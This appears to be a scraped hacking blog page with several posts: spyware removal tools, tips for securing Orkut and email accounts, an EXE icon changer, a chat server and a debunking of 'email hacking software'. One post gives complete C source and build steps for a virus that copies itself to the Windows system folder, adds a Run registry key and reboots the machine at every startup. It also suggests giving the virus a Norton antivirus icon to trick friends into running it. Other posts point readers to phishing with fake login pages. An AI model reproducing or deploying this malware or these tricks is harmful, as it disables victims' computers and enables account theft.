This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Free Tools for Spyware Removal


There are lot of PC users who know only little about “Spyware”, “Malware”, “hijackers”, “Dialers” & many more. This article will help you avoid pop-ups, spammers and all those baddies.


What is spy-ware?

Spyware is computer software that is installed surreptitiously on a personal computer to intercept or take partial control over the user’s interaction with the computer, without the user’s informed consent.The term spyware suggests software that secretly monitors the user’s behavior.Spyware programs can collect various types of personal information, such as Internet surfing habit, sites that have been visited etc.


How to check if a program has spyware?

It is this little site that keeps a database of programs that are known to install spyware.


Check Out: SpywareGuide



How To Block Pop-Ups?

If you would like to block pop-ups (IE Pop-ups) there are tons of different tools out there, but these are the two best, I think.


Try: Google Toolbar - This tool is a Freeware.

Try: AdMuncher - This tool is a Shareware.


How To Remove Spywares?

If you want to remove spwares then you may try the following tools/programs


Try: Lavasoft Ad-Aware - This tool is a freeware.

Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.


Try: Spybot-S&D - This tool is a freeware.

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.


Try: Spy Sweeper - This tool is a shareware.

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.The best scanner out there, and updated all the time.


Try: BPS Spyware and Adware Remover - This tool is a shareware.

Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you’d like to remove.


How To Prevent Spyware?

To prevent spyware attack you can try the following tools.


Try: SpywareBlaster - This tool is a freeware.

Info: SpywareBlaster doesn’t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.


Try: XP-AntiSpy - This tool is a freeware.

Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

Hack Protect your Orkut Account


Most of the people ask me “How to hack an Orkut account” which I have already discussed in my previous post Hacking Orkut .But here I am giving you a detailed information about how to protect your Orkut accounts.As we all know most of the Google services are still in BETA.So,websites like Orkut, powered by Google is not totally secure!Several people feel proud in hacking other user’s account. You do a foolish thing, and next day your account is hacked. This is very sad indeed, but hackers are adding names to their victims list till now.


How can a hacker hack my Orkut account?

The answer to this question is already discussed in my previous post Hacking Orkut.



But this post is meant for providing some safety measures to prevent your Orkut account from being hacked.There is not much you have to take care of. Just follow the simple steps and never get your orkut account hacked in your life.


1. Never try to login/access your Orkut account from sites other than Orkut.com.


2. Never click on any links from the sources you don’t trust while accessing your Orkut account.(or while accessing any other Google services like Gmail,Blogger etc.)


3. Delete any links on your scrapbook, no matter if a known or unknown person have sent it.


4. Never disclose your orkut login details with anyone.


5. Never ever use Javascripts on Orkut, no matter whatever it claims to do.Get satisfied with the services provided by default! Avoid using third party Scripts which might be malicious.


6. Never get excited to see a site claiming to have 1000 cool orkut tricks for which you have to just log in to your orkut account. Don’t trust that site. That’s a phishing site.


7. Never tick the box “REMEMBER ME” on the orkut homepage if you are surfing from a cafe or a public area.


8. Always remember to hit Sign out button, when you are done.

How to Protect an Email Account from being hacked ?


Today in this post I’ll teach you how to protect your email account from being hacked.Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”.Now one question which arises in our mind is:”Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”.The single answer to these two questions is “Absolutely NOT!”.It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.


If this is the case, then what is the reason for many people to loose their accounts?

The answer is very simple.They don’t know how to protect themselves from being hacked! In fact most of the people who loose their email accounts are not the victims of hacking but the victims of Trapping.They loose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.


Are you confused? If so continue reading and you’ll come to know…


Now I’ll mention some of the most commonly used online scams which fool people and make them loose their passwords.I’ll also mention how to protect your email account from these scams.


1. WEBSITE SPOOFING


Website spoofing is the act of creating a website, with the intention of misleading the readers.The website will be created by a different person or organisation (Other than the original)especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.


For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website.So most of the people believe that it is the original site and loose their passwords.The main intention of spoofed websites is to fool users and take away their passwords.For this,the spoofed sites offer fake login pages.These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc.Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.


Solution:



  • Never try to login/access your email account from the sites other than the original site.

  • Always type the URL of the site in the address bar to get into the site.Never click on the hyperlink to enter the site.


2. BY USING KEYLOGGERS


The other commonly used method to steal password is by using a Keylogger.Keylogger is nothing but a spyware.The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account.If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program.If you just access your email account from a computer installed with keylogger, you definitely loose your password. This is because the keylogger records each and every keystroke that you type.


Solution:


Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly.This keeps your PC secure from a keylogger.Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers.You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES


Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people loose their email account in cyber cafes.For the owner of the cyber cafe it’s just a cakewalk to steal your password.For this he just need’s to install a keylogger on his computers.So when you login to your email account from this PC, you give away your password to the cafe owner.Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.


This doesn’t mean that you should never use cyber cafes for browsing the internet.I know,all the cyber cafe owners will not be so wicked but it is recommended not to use cafes for accessing confidential information.If it comes to the matter of security never trust anyone,not even your friend.I always use my own PC to login to my accounts to ensure safety.


So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked.Please pass your comments…

How to Change the ICON of an EXE file ?


Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.


For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.


I’ll give you a step-by-step instruction on how to use this tool to change the icon.


1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).


2. Right-click on the exe file whose ICON is to be changed.


3. Now you will see the option Change Icon…Click on that option.


4. Now the Icon Changer program will open up.


5. Icon changer will search for all the ICONS on your system so that you can select any one of those.


6. Now select the ICON of your choice and click on SET.


7. Now a popup window will appear and ask you to select from either of these two options.



  • Change embeded icon.

  • Adjust Windows to display custom icon.


Select the first option (Change embeded icon).


8. You are done.The ICON get’s changed.

Creating a Virus to restart the Computer at every Startup


Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.


For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect’s this as a virus.I have coded this virus in C.So if you are familiar with C language then it’s too easy to understand the logic behind the coding.


Here is the source code.


#include<stdio.h>

#include<dos.h>

#include<dir.h>


int found,drive_no;char buff[128];


void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}


void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;


case 2:

target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;


case 3:

target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;


case 4:

target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;


default:

exit(0);

}


while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}


else

system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}


NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.


Compiling The Scource Code Into Executable Virus.



1. Download the source code here

2. The downloaded file will be Sysres.C

3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)

4. The resulting .exe file is a virus and once you execute it will infect the system.


Testing And Removing The Virus From Your PC



You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.


1. Reboot your computer in the SAFE MODE

2. Goto X:\Windows\System (X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to


HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 


 


There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.


Logic Behind The Working Of The Virus



If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.


LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.


This process is repeated every time the PC is restarted.


NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.


AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)


After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.


For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.


The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

Chat without Yahoo Messenger or Gtalk ?

Can we chat without Yahoo messenger? Most of us are familiar with the most widely used applications such as Yahoo messenger and Gtalk to carry out chatting with our friends.But here I’ll show how to chat without Yahoo messenger or Gtalk.As we all know the information we exchange with their servers(Yahoo or Gtalk) are recorded and stored along with the corresponding IP addresses.This may hurt our privacy since all the information we exchange while chatting has to pass through a third party server.



Moreover if the matter is highly confidential, then it is necessary to have a totally private chat where the messages are exchanged only between the people involved in the chat and not with any other third party servers.At these situations, it is better to chat without Yahoo messenger.

So, how to carry out a private chat without Yahoo messenger or Gtalk?

For this purpose there exists many softwares that support’s you to host a web-based chat system without any additional software or services.So with these softwares the exchange of messages takes place directly between the two persons engaging in the chat and will not pass through any other third party server.This ensures 100% privacy and eliminates the desperate need to chat with Yahoo messenger.

One of my favorite program for private chat is Easy Chat Server




Easy Chat Server is a Windows program that allows you to host a web-based chat system without any additional software or services. Unlike other chat server, you do not need to install Java. It allows you to build one or more web-based chat rooms on your machine, and provides advanced chat functionalities aiming to offer discussion space for your users, customers and partners.

Here are some of the screenshots of Easy Chat Server.



 



 


Key Features of Easy Chat Server:


  • Easy to use, Simple installation that will have you up and running in minutes.

  • 128-Bit Security Socket Layer(SSL) support. support for server level certificate creation.

  • Instantly runs a complete chat server on your PCs - does not need to install any Web Server.

  • Supports full private messaging and One to One private chat.

  • Support of images, smileys, avatar icons.

  • Full chat and access logs are available within the chat server.

  • Have a built-in IP Filter, supports banning/unbanning IP address, securely.

  • Multiple styles available for the user to customize rooms.

  • Unlimited rooms and users, no any annual, per-user, or maintenance fees.

  • No spyware, adware or other unwanted extra programs.

Email Hacking Software

Email Hacking Software - Password Hacking Software - Yahoo Hacking Software - Hotmail Hacking Software

Don’t get fooled by these words. Most of us are very curious about software that can hack emails.In fact most of the searches about hacking contain the keyword email hacking software.Yes most of the people think that it is possible to hack into Yahoo, Gmail or Hotmail using a software.But is it really possible to hack an email? Nothing is impossible! But this doesn’t mean that it is possible using a software.


Now most of you might have got confused! These are some of the questions that may arise in your mind now.




1. Is there any software that can hack an email account?



THERE IS NO READYMADE SOFTWARE FOR HACKING AN EMAIL ACCOUNT.Yes this is true.If you come across any website selling a software with the label like “EMAIL HACKING SOFTWARE” then the site is totally a scam site.I bet, there exists no such program/software.You may search the entire web, but none of the software works.This may be disappointing most of you, but it is true.So, here onwards STOP searching for such software.Most of you may not beleive my words now.Read further and you’ll understand.


Think logically! If there exists such software then what about Google,Yahoo and Hotmail.We all know that they are the top giants which are providing the email service to millions of people.They have invested billions of $$ on these projects and is one of the main source of income for them.If that can be hacked using a software? Don’t even imagine this.These giants have thousands of Network Security Specialists who work 24/7 to combat exploits.Even if there exists any such vulnerability (Bug) they are patched in quick time before they are exploited by hackers.


Suppose assume that a hacker has developed a software and has somehow succeeded to hack into an account.He can use this software to hack the accounts of some big company/merchants and make billions of dollars overnight. With this being the case why should he sell this software on the internet for some cheap money? Inturn he can keep this software as a secret and continue with his work.Now think,does it make sense in selling this software for money? Absolutely NOT.


So the bottomline is never beleive the sites which claims to offer a software to hack an email.These sites are 100% scam.


They just want to trap some innocent people who beleive this.I can give you many examples where people are fooled by these kind of sites.I’ll not disclose the names of these sites for obvious reasons.But one thing I’ll tell you.If a site claims to sell an such software or asks you to pay before they send you the password then that site is really stupid and nonsense.Even if such software exists it will never be available for sale.So don’t get fooled by these sites.There exist’s no Software for email hacking.


 

2. Are there any real hackers who can hack the password?


There may be! Who know’s.But don’t think that hacking an email is so easy.It is almost impossible to hack Yahoo,Gmail or Hotmail.So even if there exists such a hacker the chances of you getting his contact is very rare.



3. There are many sites on the internet which claim to hack any password for money.Are they legitimate? Will they really hack password?


Most of the sites which claim to hack an email are not genuine.They just cheat innocent people to sniff money.There are many sites which claim to show some proofs such as screenshot of the inbox before you can make a payment.I have tried few such sites but none of them responded or showed me such proofs.But it’s not a loss to try such sites unless you don’t pay them until they show you the proofs.But never pay before they show the proofs.


4. Finally are there any other ways to hack an email password?


One good news for all of you.It is still possible to hack an email account and get the password.These are some of the working methods that you can try to hack an email password.It is disscussed in the post Hacking An Email Account and Hacking Yahoo, Gmail or any other Password which covers the real ways of professional hacking using Fake Login Pages.